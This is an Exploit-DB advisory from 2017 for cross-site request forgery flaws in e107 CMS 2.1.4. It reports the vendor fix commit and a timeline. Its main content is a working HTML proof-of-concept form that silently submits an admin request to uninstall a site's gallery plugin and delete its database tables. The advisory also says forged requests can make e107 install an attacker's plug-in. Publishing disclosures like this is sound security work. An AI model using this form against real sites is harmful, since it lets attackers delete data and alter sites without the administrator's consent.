e107 CMS 2.1.4 – Cross-Site Request Forgery

  • 作者: Zhiyang Zeng
    日期: 2017-04-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41844/
  • <!--
    ==========================
    Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
    Author:Zhiyang Zeng
    
    Product:
    —————
    e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started
    —————
    
    Fix
    —————
    Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5
    —————
    
    Summary
    ————
    e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin-installing,meta-changingand settings-changing,a malicious web page can use
    forged requests to make e107 download and install a plug-in provided by the attacker.
    ————
    
    Timeline
    ———
    2017-03-01 report to vendor
    2017-03-02GitHub commit to fix token missing
    ———
    
     Reproduce:
    ==========
    I just give a uninstall any plugins POC.
    
    vul address:http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php
    
    POC:
    -->
    
    <form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8" method="post">
    <input type="text" name="delete_tables" value="1">
    <input type="text" name="delete_ipool" value="1">
    <input type="text" name="delete_files" value="0">
    <input type="text" name="uninstall_confirm" value="Confirm uninstall">
    <input type="submit" name="submit">
    </form>
    
    <!--
    Description:
    I try to uninstall plugingallery which id is 8.
    
    visiting beyond POC page, you will find gallery plugin has been uninstalled success!
    ===========
    -->